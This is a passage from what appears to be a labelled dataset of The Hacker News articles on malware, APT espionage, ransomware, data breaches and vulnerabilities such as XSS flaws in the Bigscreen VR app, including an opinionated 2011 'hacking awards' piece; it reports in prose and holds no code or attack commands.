set_sms_number - change the number to which messages containing the text string 'pong' are sent.
The command start_sms_forwarding is of particular interest since it allows attackers to indicate the number from which the Trojan needs to intercept messages. This feature enables criminals to use the Trojan for targeted attacks and steal specific messages.
",Malware
Chinese Hackers Target Air-Gapped Networks in Southeast Asia,https://thehackernews.com/2015/04/a-state-sponsored-cyber-espionage-group.html,"A State-sponsored Cyber Espionage Group -- most likely linked to the Chinese government becomes the first group to target the so-called ""Air-Gapped Networks"" that aren't directly connected to the Internet.
What are Air-Gapped systems?
Air-gapped systems are known to be the most safest and secure systems on the earth. These systems are isolated from the Internet or any other Internet-connected computers or external networks.
Air-gapped systems are generally used in the critical situations that demand high security like in payment networks to process debit and credit card transactions, military networks, and in industrial control systems that operate critical infrastructure of the Nation.
Why Air-Gapped?
It is very difficult to siphon data from Air-Gapped systems because it requires a physical access to the target system or machine in order to do that and gaining physical access is possible only by using removable devices such as a firewire cable or a USB flash drive.
Now:
Since 2005, a Chinese Hacking Group has been spying dedicatedly on Governments, Companies & Journalists in Southeast Asia, India, & other countries, according to FireEye.
In a 69-page technical report, FireEye said the Chinese cyber espionage operations went undetected for the last ten years, conducted by a team of highly skilled hackers, dubbed APT30 (Advanced Persistent Threat).
Now here's the deal:
The APT30 Group is particularly interested in stealing information related to:
Regional Political
Disputed Territories
Military and Economic issues
Media Organizations and journalists
Political Developments in Southeast Asia and India
""APT30's attempts to compromise journalists and media outlets could also be used to punish outlets that do not provide favorable coverage – for example, both the New York Times and Bloomberg have had trouble securing visas for journalists in wake of unfavorable corruption reporting,"", the report said.
This isn't enough:
The group has reportedly developed a number of secret hacking tools and backdoors [MILKMAID, ORANGEADE Droppers, CREAMSICLE Downloader, BACKBEND, GEMCUTTER Downloaders] over the period of last ten years and infected victims using Phishing and Social Engineering attacks.
However, the Capability to infiltrating air gapped systems makes the APT30 hacking group more sophisticated in nature.
In order to hack into an air-gapped computer, the group tricked their victims into downloading malware on their home computers.
""APT30 uses three pieces of malware [SHIPSHAPE, SPACESHIP, FLASHFLOOD] that are believed to have been designed to propagate to removable drives with the intent of eventually infecting and stealing data from computers located on air-gapped networks.""
The Malware, designed with worm-like capabilities, can infect removable drives such as USB sticks and hard drives. Those devices can transfer the malware if later plugged into the secure networks.
TARGETED COUNTRIES
The countries primarily targeted were:
India
Malaysia
Vietnam
Thailand
South Korea
Nepal
Bhutan
Philippines
Singapore
Saudi Arabia
Indonesia
Japan
Brunei
Myanmar
Laos
Cambodia
The Government of China has consistently denied these claims, arguing ""cybercrime is a global problem.""
",Malware
U.S. Recovers $2.3 Million Ransom Paid to Colonial Pipeline Hackers,https://thehackernews.com/2021/06/us-recovers-23-million-ransom-paid-to.html,"In a major blow, the U.S. Department of Justice on Monday said it has recovered 63.7 bitcoins (currently valued at $2.3 million) paid by Colonial Pipeline to the DarkSide ransomware extortionists on May 8, pursuant to a seizure warrant that was authorized by the Northern District of California.
The ransomware attack also hobbled the pipeline company's fuel supply, prompting the government to issue an emergency declaration, even as the company shelled out a ransom amount of approximately 75 bitcoins ($4.4 million as of May 8) to regain access to its systems.
A week after the highly publicized incident, the ransomware-as-a-service syndicate disbanded with a May 14 farewell message to affiliates, stating that its internet servers and cryptocurrency stash were seized by unknown law enforcement entities. While DarkSide's announcement was perceived as an exit scam, the latest move from DoJ confirms earlier speculations of law enforcement involvement.
Stating that ""ransom payments are the fuel that propels the digital extortion engine,"" the DoJ said it followed the money trails left by the DarkSide gang to a specific bitcoin address by reviewing the Bitcoin public ledger, to which the proceeds of the ransom payment were transferred, ultimately using the ""private key"" the FBI had in its possession to access crypto assets stored in the wallet in question.
""There is no place beyond the reach of the FBI to conceal illicit funds that will prevent us from imposing risk and consequences upon malicious cyber actors,"" said FBI Deputy Director Paul Abbate. ""We will continue to use all of our available resources and leverage our domestic and international partnerships to disrupt ransomware attacks and protect our private sector partners and the American public.""
It's not immediately clear how the intelligence agency came to have the private key, but DarkSide had previously claimed to have lost access to one of their payment servers.
Blockchain analytics firm Elliptic, which had identified the bitcoin transaction representing the Colonial Pipeline ransom payment, said the seized bitcoins represent 85% of the total ransom amount which is typically reserved for affiliates, with the rest going to the DarkSide developers. The Bitcoin address was emptied at around 1:40 p.m. ET on Monday, Dr. Tom Robinson, Elliptic's co-founder and chief scientist, said.
If anything, the seizure marks a first-of-its-kind orchestrated effort led by the DoJ's newly formed Ransomware and Digital Extortion Task Force to confiscate a cybercriminal cartel's illicit profits by breaking into its bitcoin wallet using its private key likely stored in the seized servers, as implied in the warrant.
""Holding cyber criminals accountable and disrupting the ecosystem that allows them to operate is the best way to deter and defend against future attacks of this nature,"" Colonial Pipeline CEO Joseph Blount said in the statement. ""The private sector also has an equally important role to play and we must continue to take cyber threats seriously and invest accordingly to harden our defenses.""
",Cyber_Attack
Warning: Beware of Post-Election Phishing Emails Targeting NGOs and Think Tanks,https://thehackernews.com/2016/11/election-trump-phishing-malware.html,"Just a few hours after Donald Trump won the 2016 US Presidential Election, a hacking group launched a wave of cyber attacks targeting U.S.-based policy think-tanks with a new spear phishing campaign designed to fool victims into installing malware.
The group of nation-state hackers, also known as Cozy Bear, APT29, and CozyDuke, is the one of those involved in the recent data breach of the Democratic National Committee (DNC) and is allegedly tied to the Russian government.
On Wednesday, the hackers sent a series of phishing emails to dozens of targets associated with non-governmental organizations (NGOs), policy think tanks in the US and even inside the US government, said security firm Volexity.
Phishing Attacks Powered by 'PowerDuke' Malware
The phishing emails were sent from purpose-built Gmail accounts and other compromised email accounts at Harvard University's Faculty of Arts and Sciences (FAS), trying to trick victims into opening tainted attachments containing malware and clicking on malicious links.
Once this was done, the phishing e-mail dropped a new variant of Backdoor malware, dubbed ""PowerDuke,"" giving attackers remote access to the compromised systems.
PowerDuke is an extremely sophisticated piece of malware in both its way of infecting people as well as concealing its presence.
Besides making use of wide variety of approaches, PowerDuke uses steganography to hide its backdoor code in PNG files.
The firm spotted and reported at least five waves of phishing attacks targeting people who work for organizations, including Radio Free Europe/Radio Liberty, the RAND Corporation, the Atlantic Council, and the State Department, among others.
""Three of the five attack waves contained links to download files from domains that the attackers appear to have control over,"" the firm said in a blog post. ""The other two attacks contained documents with malicious macros embedded within them. Each of these different attack waves was slightly different from one another.""
Beware of Post-Election Themed Phishing Emails
All the phishing emails were election-themed. Why?
After Trump won the US presidential election, half of America, as well as people across the world, mourning the result was curious to know about the victory of Trump.
People even started searching on Google: How did Donald Trump win the US presidential election?, Were the election flawed? Why did Hillary Clinton lose?
Hackers took advantage of this curiosity to target victims, especially those who worked with the United States government and were much more concerned about Trump's victory.
Two of the emails claimed to have come from the Clinton Foundation giving insight of the elections, two others purported to be documents pertaining to the election's outcome being revised or rigged, and the last one offered a link to a PDF download on 'Why American Elections Are Flawed.'
The emails were sent using the real email address of a professor at Harvard, which indicates that the hackers likely hacked the professor's email and then used his account to send out the phishing emails.
The emails either contained malicious links to .ZIP files or included malicious Windows shortcut files linked to a ""clean"" Rich Text Format document and a PowerShell script.
Once clicked, the script installed PowerDuke on a victim's computer that could allow attackers to examine and control the target system. The malware has the capability to secretly download additional malicious files and evade detection from antivirus products.
Security firm CrowdStrike claimed in June 2016 that the hacking team Cozy Bear has previously hacked into networks belonging to the White House, State Department, and the United States Joint Chiefs of Staff.
",Cyber_Attack
Legacy Native Malware in Angry Birds Space to pwn your Android !,https://thehackernews.com/2012/04/legacy-native-malware-in-angry-birds.html,"Legacy Native Malware in Angry Birds Space to pwn your Android
A new malware threatens phones and tablets running Google's OS by hiding inside a copy of the popular game. Researchers at the mobile security firm Lookout identified the reworked malware as Legacy Native (LeNa), which poses as a legitimate app to gain unauthorized privileges on Android phones.
Under the appearance of a legitimate application, LeNa tricked users into allowing it access to information. ""By employing an exploit, this new variant of LeNa does not depend on user interaction to gain root access to a device. This extends its impact to users of devices not patched against this vulnerability (versions prior to 2.3.4 that do not otherwise have a back-ported patch),"" Lookout said in a blog post.
In March, another Trojan appeared pretending to be legitimate Chinese game, The Roar of the Pharaoh. The malicious app appeared on the Google Play store, stealing users' data and money by sending SMS messages to premium-rate numbers without the owner's knowledge.
One binary exploits the GingerBreak vulnerability to drop and launch the second, an updated version of LeNa. This payload communicates with a remote Command and Control server and accepts instructions to install additional packages and push URLs to be displayed in the browser.
The malware connects to remote servers in order to send sensitive phone information and to install malicious software on the infected handset. The new LeNa seems like a fully functional copy of popular apps, like ""Angry Birds Space,"" and, according to Lookout, ""hides its malicious payload in the string of code at the end of an otherwise genuine JPEG file.""
Well ! Before you download any app, check the permissions it requests, if you're uncomfortable with the amount of access to your phone an app wants, don't download it. For now, Android users who are only downloading apps from Google Play (Android Market) are safe. The new version of LeNa has been spotted on third-party Chinese app websites.
",Malware
Flame spy virus going to Suicide,https://thehackernews.com/2012/06/flame-spy-virus-going-to-suicide.html,"Flame spy virus going to Suicide
The creators of the world's most complicated espionage virus Flame have sent a 'suicide' command that removes it from some infected computers. U.S. computer security researchers said on Sunday that the Flame computer virus, which struck at least 600 specific computer systems in Iran, Syria, Lebanon, Egypt, Sudan, Saudi Arabia and the Palestinian Authority, has gotten orders to vanish, leaving no trace.
The 20-megabyte piece of malware already had a self-destruct module known as SUICIDE that removed all files and folders associated with Flame, but the purging command observed by Symantec researchers instead relied on a file called browse23.ocx that did much the same thing. According to Symantec, the 'suicide' command was ""designed to completely remove Flame from the compromised computer,"" the BBC reports.
Computers infected with Flame, including honeypots, have been routinely contacting its C&C servers to check for new commands. When the C&C servers still owned by Flame's authors recently sent out a self-destruct code, Symantec detected the command immediately.
Flame was designed to suck information from computer networks and relay what it learned back to those controlling the virus. It can record keystrokes, capture screen images, and eavesdrop using microphones built into computers.
Bots have long contained such self-destruct mechanisms, so it's not surprising that malware as complex and comprehensive as Flame would, too.
",Malware
Experian South Africa Suffers Data Breach Affecting Millions; Attacker Identified,https://thehackernews.com/2020/08/experian-data-breach-attack.html,"The South African arm of one of the world's largest credit check companies Experian yesterday announced a data breach incident that exposed personal information of millions of its customers.
While Experian itself didn't mention the number of affect customers, in a report, the South African Banking Risk Information Centre—an anti-fraud and banking non-profit organization who worked with Experian to investigate the breach—disclosed that the attacker had reportedly stolen data of 24 million South Africans and 793,749 business entities.
Notably, according to the company, the suspected attacker behind this breach had already been identified, and the stolen data of its customers had successfully been deleted from his/her computing devices.
""We have identified the suspect and confirm that Experian South Africa was successful in obtaining and executing an Anton Piller order which resulted in the individual's hardware being impounded and the misappropriated data being secured and deleted.""
Experian South Africa has already reported the breach to law enforcement and the appropriate regulatory authorities.
The company claims there is no evidence indicating whether the stolen data includes consumers' credit or financial information or used for fraudulent purposes before authorities had it deleted.
""Our investigations also show that the suspect had intended to use the data to create marketing leads to offer insurance and credit-related services.""
""The compromise of personal information can create opportunities for criminals to impersonate you but does not guarantee access to your banking profile or accounts. However, criminals can use this information to trick you into disclosing your confidential banking details,"" says SABRIC CEO, Nischal Mewalall.
Besides releasing this information, SAFPS also recommended that credit reporting agency customers should immediately apply for a free Protective Registration listing with Southern Africa Fraud Prevention Service that has been designed to alert users when their identity is compromised.
You can also regularly check your credit report for free here.
",Data_Breaches
Hackers Exploit VPN to Deploy SUPERNOVA malware on SolarWinds Orion,https://thehackernews.com/2021/04/hackers-exploit-vpn-flaw-to-deploy.html,"The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has disclosed details of a new advanced persistent threat (APT) that's leveraging the Supernova backdoor to compromise SolarWinds Orion installations after gaining access to the network through a connection to a Pulse Secure VPN device.
""The threat actor connected to the entity's network via a Pulse Secure virtual private network (VPN) appliance, moved laterally to its SolarWinds Orion server, installed malware referred to by security researchers as SUPERNOVA (a .NET web shell), and collected credentials,"" the agency said on Thursday.
CISA said it identified the threat actor during an incident response engagement at an unnamed organization and found that the attacker had access to the enterprise's network for nearly a year through the use of the VPN credentials between March 2020 and February 2021.
Interestingly, the adversary is said to have used valid accounts that had multi-factor authentication (MFA) enabled, rather than an exploit for a vulnerability, to connect to the VPN, thus allowing them to masquerade as legitimate teleworking employees of the affected entity.
In December 2020, Microsoft disclosed that a second espionage group may have been abusing the IT infrastructure provider's Orion software to drop a persistent backdoor called Supernova on target systems. The intrusions have since been attributed to a China-linked threat actor called Spiral.
Unlike Sunburst and other pieces of malware that have been connected to the SolarWinds compromise, Supernova is a .NET web shell implemented by modifying an ""app_web_logoimagehandler.ashx.b6031896.dll"" module of the SolarWinds Orion application. The modifications were made possible by leveraging an authentication bypass vulnerability in the Orion API tracked as CVE-2020-10148, in turn permitting a remote attacker to execute unauthenticated API commands.
An investigation into the incident is ongoing. In the meantime, CISA is recommending organizations to implement MFA for privileged accounts, enable firewalls to filter unsolicited connection requests, enforce strong password policies, and secure Remote Desktop Protocol (RDP) and other remote access solutions.
",Malware
ZeuS Botnet Updating Infected Systems with Rootkit-Equipped Trojan,https://thehackernews.com/2014/04/zeus-banking-trojan-botnet-rootkit-malware.html,"ZeuS, or Zbot is one of the oldest families of financial malware, it is a Trojan horse capable to carry out various malicious and criminal tasks and is often used to steal banking information. It is distributed to a wide audience, primarily through infected web pages, spam campaigns and drive-by downloads.
Earlier this month, Comodo AV labs identified a dangerous variant of ZeuS Banking Trojan which is signed by stolen Digital Certificate belonging to Microsoft Developer to avoid detection from Web browsers and anti-virus systems.
FREE! FREE! ZeuS BRINGS ROOTKIT UPDATE
Recently, the security researcher, Kan Chen at Fortinet has found that P2P Zeus botnet is updating its bots/infected systems with updates version that has the capability to drop a rootkit into infected systems and hides the trojan to prevent the removal of malicious files and registry entries.
The new variant also double check for the earlier installed version (0x38) of ZeuS trojan on the infected system and then replaces it with updated binary files (0X3B version).
""Every P2P Zeus binary would extract the version number from the update packet and compare the version number that is hardcoded in its body"" to verify the success of update process.
According to researchers, there is only a minimal change in the new variant of P2P Zeus as the new binary also drops a rootkit driver file into the %SYSTEM32%\drivers folder, apart from its original functions. New Zeus Trojan equipped with rootkit feature makes it more sophisticated and increases the difficulty of removing Zeus from infected systems.
HOW TO PROTECT YOURSELF FROM ZeuS TROJAN
We recommend users to use common sense and think twice before giving a click to any link on their e-mails or at any other websites they visit.
Trustworthy companies don't send attachments unless you have requested specific documents. So, always use caution if you receive any email from an unknown contact with attachments that you haven't requested and do not bother to open it.
Install a best Internet Security Tool and Configure the firewall to maximize the security of your computer system.
",Malware
DarkBot Malware Circulation very fast via Skype,https://thehackernews.com/2012/10/darkbot-malware-circulation-very-fast.html,"Two weeks back we reported that Security firm Trend Micro discovered a worm targeting Skype users with spam messages designed to infect machines with the Dorkbot ransomware has been discovered. This malware is spreading through a question/ phrase sent to the users by someone and the question is: ""lol is this your new profile pic?""
Yesterday Security researchers from Avast have intercepted a currently spreading Darkbot malware campaign, that's affecting millions of Skype users. According to him,"" It targets all the major Web browsers, and is also capable of distributing related malware such as Ransomware/LockScreen, as well as steal accounting data for major social networking services such as Facebook, Twitter, as well as related services such as GoDaddy, PayPal and Netflix.""
Some of the infected PCs install the malware known as ransomeware which locks your PC and ask you to pay $200 dollars within 48 hours to retrieve your files.
""If you click on the link, your infected computer becomes part of a botnet, or a network of computers controlled by hackers to execute DDoS (distributed denial of service) attacks. A DDoS attack causes the site or service to be temporarily unavailable by flooding the targeted website with traffic until the site's servers are overloaded.""
Initially only 2 of the present 44 antivirus engines identified the threat, but currently the number has increased to 27, which is still quite low. However, it also indicates that about 1 Million users must have clicked o the links and greeted infection on the links.
Users are advised to ensure that they're running the latest version of their third-party software, browser plugins, ensure that the URL they're about to click on hasn't already been flagged as malicious, and take advantage of application sandboxing techniques to avoid direct exploitation of their host.
",Malware
The Hacker News Hacking Awards : Best of Year 2011,https://thehackernews.com/2012/01/hacker-news-hacking-awards-best-of-year.html,"The Hacker News Hacking Awards : Best of Year 2011
2011 has been labeled the ""Year of the Hack"" or ""Epic #Fail 2011"". Hacking has become much easier over the years, which is why 2011 had a lot of hacking for good and for bad. Hackers are coming up with tools as well as finding new methods for hacking faster then companies can increase their security. Every year there are always forward advancements in the tools and programs that can be used by the hackers.
At the end of year 2011 we decided to give ""The Hacker News Awards 2011"". The Hacker News Awards will be an annual awards ceremony celebrating the achievements and failures of security researchers and the Hacking community. The THN Award is judged by a panel of respected security researchers and Editors at The Hacker News.
Year 2011 came to an end following Operation Payback and Antisec, which targeted companies refusing to accept payments to WikiLeak's, such as, Visa and Amazon. Those attacks were carried out by Anonymous & Lulzsec. This year corporations, international agencies, and governments are now experiencing a flood of what is called Advanced Persistent Threats. APTs refer to a group of well-funded, highly capable hackers pursuing a specific agenda, often organized by a nation or State. Sony somehow pissed off the hacking group LulzSec, which downloaded information for millions of users, while posting to Sony's system: ""LulzSec was here you sexy bastards! Stupid Sony, so very stupid.""
The Hacker News Awards Categories & Winners
1.) Person of the Year : Julian Paul Assange
He is, of course, the lean, tall, and pale 39-year-old Australian master hacker at the white-hot center of the whistle-blowing website WikiLeaks and, after revealing thousands of secret Afghan battlefield reports this week, the subject of investigation by U.S. authorities. 2011 could also be called the ""Age of WikiLeaks"". Assange described himself in a private conversation as ""the heart and soul of this organisation, its founder, philosopher, spokesperson, original coder, organizer, financier, and all the rest"". Wikileaks celebrate its 5th Birthday on 4th October 2011, for being only 5 years old they have done a remarkable and outstanding job of serving the people. The one thing most governments in the world have left off their agenda's. Keep up the good work Wikileaks and we stand in support and behind you.
2.) Best Hacking Group of the Year 2011 : ANONYMOUS
DECK THE HALLS AND BATTON DOWN THE SECURITY SYSTEMS…..THEY AIN'T GOIN AWAY!
Anonymous hackers have gained world wide attention because of their hacktivism. Anonymous is not an organization. Anonymous has no leaders, no gurus, no ideologists. Anonymous has performed many operations like Attack on HBGary Federal, 2011 Bank of America document release, Operation Sony, Operation Anti-Security and lots more. Complete Coverage on all Anonymous related news is here.
3.) Best Whitehat hacker of the Year 2011 : CHARLIE MILLER
CHARLIE SHOWS TUNA ISN'T THE ONLY THING TO PROFIT FROM!
Charlie Miller is a former hacker who has become an information security consultant now working with the Department of Defense (DOD) and helping out with cyber security. He spent five years working for the National Security Agency. Miller demonstrated his hacks publicly on products manufactured by Apple. In 2008 he won a $10,000 cash prize at the hacker conference Pwn2Own in Vancouver Canada for being the first to find a critical bug in the ultrathin MacBook Air. The next year, he won $5,000 for cracking Safari. In 2009 he also demonstrated an SMS processing vulnerability that allowed for complete compromise of the Apple iPhone and denial-of-service attacks on other phones. In 2011 he found a security hole in an iPhone's or iPad's security. Charlie Miller gets a kick of out defeating Apple's security mechanisms, using his hacking skills to break into Macbooks and iPhones.
4.) Best Leak of the year 2011 : HBGARY FEDERAL EMAILS LEAKED BY ANONYMOUS
GEE GREG, YOU THOUGHT WE JUST PLAYED WITH MATEL COMPUTERS! NOT!!!!!
HBGary Federal who was helping the federal government track down cyber activists was itself hacked by the very same activists! Gotta love these guys. Through an elegant but by the numbers social engineering effort those fun fellas at Anonymous, hacked and publicly shamed poor little HBGary Federal. Massive reputation damage and tons of turn-over in executive leadership resulted. Anonymous released 27,000 emails from the server of Greg Hoglund, chief executive of the software security firm HBGary. They posted 50,000 emails of Aaron Barr from the CEO of its sister organization, HBGary Federal. They obtained the emails by hacking into Hoglund's email.
5.) Best Defacement of the Year 2011 : DNS HIJACKING OF HIGH PROFILE SITES BY TURKGUVENLIGI
TURKGUVENLIGI……..THE GIFT THAT KEEPS ON GIVING!!
Turkguvenligi also known by the name ""TG Hacker' hacked some very high profile sites using DNS Hijacking. Sites included, Theregister.co.uk , Vodafone, Telegraph, Acer, National Geographic. He diverted visitors to a page declaring it was ""World Hackers Day"". TurkGuvenligi has claimed credit for dozens of similar defacement attacks since late 2008.
6.) Craziest Hack of the year: INMOTION HOSTING (Over 700,000 Websites Hacked)
BEWARE OF TIGER'S IN MOTION…….COMING TO YOUR WEBSITE SOON!
InMotion's data center got hit by the hacker that calls himself TiGER-M@TE, leaving a few hundred thousand website owners with nonfunctional pages and 700,000 web Pages defaced . He is also the one responsible for the attack carried out on Google Bangladesh. In our humble opinion, this is the craziest hack of the year.
7.) Malware of Year 2011 : DuQu
ALAH CAN'T HELP IRAN…….NOT WITH DuQu ON THE LOOSE!
This year was really hot on malware discovery and analysis. DuQu became the first known network modular rootkit. DuQu has flexibility for hackers to help remove and add new features quickly and without special effort. Some experts have doubts on relation between the Stuxnet and DuQu creators as they both aim for stealing and collecting data related to Iranian agencies activities.
8.) Best Hacking Tool of the Year 2011 - ANTI (Android Network Toolkit)
HEY CYBER WORLD, STICK THIS IN YOUR TOOL BELT!
ANTI is the smallest but most powerful hacking tool developed by the company Zimperium. Anti-Android Network Toolkit is an app that uses WiFi scanning tools to scan networks. You can scan a network that you have the phone connected to or you can scan any other nearby open networks. Security admins can use Anti to test network host vulnerabilities for DoS attacks and other threats. Features : OS detection, traceroute, port connect, Wi-Fi monitor, HTTP server, man-in-the-middle threats, remote exploits, Password Cracker and DoS attack and plugins.
9.) High Profile Hacker of the Year 2011 : LULZSEC
LULZSEC KEEPS US LAUGHING ALL THROUGH 2011!
Lulz Security, commonly abbreviated as LulzSec, is a computer hacker group that claims responsibility for several high profile attacks, including the compromise of user accounts from Sony Pictures in 2011. The group also claimed responsibility for taking the CIA website offline. It has gained attention due to its high profile targets and the sarcastic messages it has posted in the aftermath of its attacks. The group's first recorded attack was against Fox.com's website. LulzSec does not appear to hack for financial profit. The group's claimed main motivation is to have fun by causing mayhem. They do things ""for the lulz"" and focus on the possible comedic and entertainment value of attacking targets.
10.) Biggest Victim of the Year 2011 : SONY
SONY SHINES AS THE BIGGEST VICTIM OF ALL!
Sony gets the Most Epic fail award so we want to give the Best Victim of the year award to Sony. Almost all Sony's websites including Indonesia, Japan, Thailand, Greece, Canada, Netherlands, Europe, Russia, Portugal & Sony PlayStation Network were Hacked. Defacement of various domains of Sony and Personal information of 77 million people, including customer names, addresses, e-mail addresses, birthdays, PlayStation Network and Qriocity passwords, user names, online handles and possibly credit cards were exposed. Sony expects the hack of the PlayStation Network and cost at ¥14 billion (US$170 million) .
11.) Most Spamy Social Network : FACEBOOK
FACEBOOK OUTTA FACE IT……..IT'S A RIPE TARGET FOR 2012
Social network sites such as Facebook, Google+ or Twitter are gaining popularity. But the 'Web 2.0' presents new dangers. The wave of pornographic and violent images, Spam messages, Virus and various Worms that flooded Facebook over the past year, make it the Most Spamy Social Network of the Year. Social media is the new frontier for all of this spam. The attack tricked users into clicking on a story they thought would bring them a related video or picture. Instead, Facebook members were taken to websites that attacked their browsers with malicious software and posted violent and disturbing images to their news feeds.
12.) Most Vulnerable Mobile OS of Year 2011 : ANDROIDS
MALWARE GETS A FREE RIDE ON MOBILE DEVICES!
Mobile devices are seeing a record number of Malware attacks, with Androids leading the way as the mobile operating systems are the most likely to be targeted. Android's vulnerability to malicious content including third-party apps, SMS Trojan viruses and unexpected bugs distributed through free Wi-Fi connections has risen by 45% in 2011. This year we have seen record-breaking numbers of Malware, especially on mobile devices, where the uptake is in direct correlation to popularity.
13.) Best Hacking Book of the Year: BACKTRACK 5 WIRELESS PENETRATION TESTING
ATTENTION CLASS, VIVEK RAMACHANDRAN HAS ENTERED THE ROOM!
Vivek Ramachandran is a world renowned security researcher and evangelist, who is well known for his discovery of the Wireless Caffe Latte attack, and author of the most amazing book ""BackTrack 5 Wireless Penetration Testing. This book is written completely from a practical perspective. The book wastes no time in delving into a hands-on session with wireless networking. All the way through there are lots of screengrabs, so you can see what should be happening on your screen.
14.) Most Innovative Hack : DIGITAL CERTIFICATES SPOOFING BY COMODO HACKER
COMODOHACKER BRINGS OUT THE DRAGON IN CYBER SECURITY CONCERNS
The name ""Comodohacker"" gets the most Innovative Hacker award from THN for the breach of the Internet's trust system arising from an outmoded method for assuring that a Web site is authentic. A breach that let a hacker spoof digital certificates for Google.com, Yahoo.com, and other Web sites is prompting browser makers to rethink security. A 21-year-old Iranian patriot took credit saying he was protesting US policy and retaliating against the US for its alleged involvement with last year's Stuxnet, which experts say was designed to target Iran's nuclear program.
15.) Biggest hack of the Year 2011 : SONY PLAYSTATION
SONY, SONY, WE PLAY YOUR LEAKS ON OUR OWN STATIONS!
The PlayStation Network is an online multiplayer gaming and digital media delivery service owned and run by Sony Computer Entertainment .On April 26, 2011 Sony Playstation announced its network and Qriocity had both been compromised by hackers between April 17 and April 19 allowing access to 70 million user accounts. Get full coverage on this News.
""TRUTH IS THE MOST POWERFUL WEAPON AGAINST INJUSTICE""
For additional information, please contact us at: thehackernews@gmail.com
",Vulnerability
Microsoft remotely deleted Tor-based 'Sefnit Botnet' from more than 2 Million Systems,https://thehackernews.com/2014/01/microsoft-remotely-deleted-tor-browser.html,"In October 2013, Microsoft adopted a silent, offensive method to tackle infection due to a Tor-based botnet malware called 'Sefnit'.
In an effort to takedown of the Sefnit botnet to protect windows users, Microsoft remotely removes the older versions of installed Tor Browser software and infection from 2 Million systems, even without the knowledge of the system's owner.
Last year in August, after Snowden revelations about the National Security Agency's (NSA) Spying programs, the Internet users were under fear of being spied. During the same time Tor Project leaders noticed almost 600% increase in the number of users over the anonymizing networks of Tor i.e. More than 600,000 users join Tor within few weeks.
In September, researchers identified the major reason of increased Tor users i.e. A Tor-based botnet called 'Sefnit malware', which was infecting millions of computers for click fraud and bitcoin mining.
To achieve the maximum number of infections, cyber criminals were using several ways to spread their botnet. On later investigation, Microsoft discovered some popular softwares like Browser Protector and FileScout, bundled with vulnerable version of Tor Browser & Sefnit components.
'The security problem lies in the fact that during a Sefnit component infection, the Tor client service is also silently installed in the background. Even after Sefnit is removed, unless specific care is taken, the Tor service will be left and still regularly connect to the Tor Network.'
It was not practically possible for Microsoft or the Government to instruct each individual on 'How to remove this Malware', so finally Microsoft took the decision of remotely washing out the infections themselves.
To clean infected machines, Microsoft began updating definitions for its antimalware apps.
""We modified our signatures to remove the Sefnit-added Tor client service. Signature and remediation are included in all Microsoft security software, including Microsoft Security Essentials, Windows Defender on Windows 8, Microsoft Safety Scanner, Microsoft System Center Endpoint Protection, and Windows Defender Offline."" and later also in Malicious Software Removal Tool.
But why Tor Browser?
""Even after Sefnit is removed, unless specific care is taken, the Tor service will be left and still regularly connect to the Tor Network. This is a problem not only for the workload it applies to the Tor Network, but also for the security of these computers."" Microsoft says.
So they removed it and to Justify their action, Microsoft points out several vulnerabilities in the Tor version bundled with Sefnit malware i.e. Tor version 0.2.3.25, that opens the user to attack through these known vulnerabilities.
""Tor is a good application used to anonymous traffic and usually poses no threat. Unfortunately, the version installed by Sefnit is v0.2.3.25 – and does not self-update. The latest Tor release builds at the time of writing is v0.2.4.20.""
May be this is the right way to neutralize the infections, but the Microsoft's action also clarifies the capability to remotely remove any software from your computer.
Nicholas J. Hopper from University of Minnesota, provided a detailed explanation about 'Protecting Tor from botnet abuse in the long term' in a paper.
",Vulnerability
Hacking Virtual Reality – Researchers Exploit Popular Bigscreen VR App,https://thehackernews.com/2019/02/bigscreen-vr-hacking.html,"A team of cybersecurity researchers from the University of New Haven yesterday released a video demonstrating how vulnerabilities that most programmers often underestimate could have allowed hackers to evade privacy and security of your virtual reality experience as well as the real world.
According to the researchers—Ibrahim Baggili, Peter Casey and Martin Vondráček—the underlying vulnerabilities, technical details of which are not yet publicly available but shared exclusively with The Hacker News, resided in a popular virtual reality (VR) application called Bigscreen and the Unity game development platform, on which Bigscreen is built.
Bigscreen is a popular VR application that describes itself as a ""virtual living room,"" enabling friends to hang out together in virtual world, watch movies in a virtual cinema, chat in the lobby, make private rooms, collaborate on projects together, share their computer screens or control in a virtual environment and more.
Scary Things Hackers Can Do to Your VR Experience
As shown in the video, the flaws in Bigscreen app literally allowed researchers to remotely hijack Bigscreen's web infrastructure (that runs behind its desktop application) and perform multiple attack scenarios through a custom-designed command-and-control server, including:
discover private rooms,
join any VR room, including private rooms,
eavesdrop on users while remaining invisible in any VR room,
view VR users' computer screens in real-time,
stealthily receive victim's screen sharing, audio, and microphone audio,
send messages on the user's behalf,
remove/ban users from a room
setup a self-replicating worm that could spread across the Bigscreen community,
and many more.
What's even more Worrisome? Besides this, a different vulnerability in the Unity Engine Scripting API that researchers exploited in combination with the Bigscreen flaw, allowed them to even take complete control over VR users' computers by secretly downloading and installing malware or running malicious commands without requiring any further interaction.
Bigscreen VR App and Unity Engine Vulnerabilities
According to the in-depth technical details shared with The Hacker News, multiple Bigscreen flaws in question are persistent/stored cross-site scripting (XSS) issues that reside in the input fields where VR users are supposed to submit their username, room name, room description, room category in the Bigscreen app.
Since the vulnerable input boxes were not sanitized, attackers could have leveraged the flaw to inject and execute malicious JavaScript code on the application installed by other users connecting to the Bigscreen lobby and VR rooms.
""The payload script will be executed upon the browser-based player entering a room affecting all members of the room. This attack vector allows for the modification/invocation of any variable/function within the scope of the Window,"" researchers told The Hacker News.
""In summary, the ability to execute JavaScript on the victim's machine allows for many other attacks such as phishing pop-ups, forged messages, and forced desktop sharing.""
""We observed a lack of authentication when handling private room joining and communications with the Bigscreen signaling server. As a result, several potential vulnerabilities arise, to include denial of service, manipulation of public rooms, brute force attacks, and server resource exhaustion.""
As demonstrated by the team, attackers can also inject malicious JavaScript payloads to leverage an undocumented and potentially dangerous Unity Scripting API to secretly download malware from the Internet and execute it on a targeted system or for all users.
""The function Unity.openLink() was found to launch web links in the default 6 browsers. An XSS attack containing an HTTP, FTP, or SMB link could cause arbitrary files to be fetched and downloaded,"" researchers told The Hacker News.
""We expect that most of the applications using affected Unity API may be vulnerable.""
The team discovered the vulnerabilities while testing the security of VR systems through its National Science Foundation-funded project.
Man-in-the-Room (MITR) Attack
As dubbed by the researchers, Man-in-the-Room is one of the attack scenarios where a hacker secretly joins a VR room while remaining invisible to other users in the same room.
""They can't see you, they can't hear you, but the hacker can hear and see them, like an invisible Peeping Tom. A different layer of privacy has been invaded,"" Ibrahim Baggili, founder and co-director of the Cyber Forensics Research and Education Group, said.
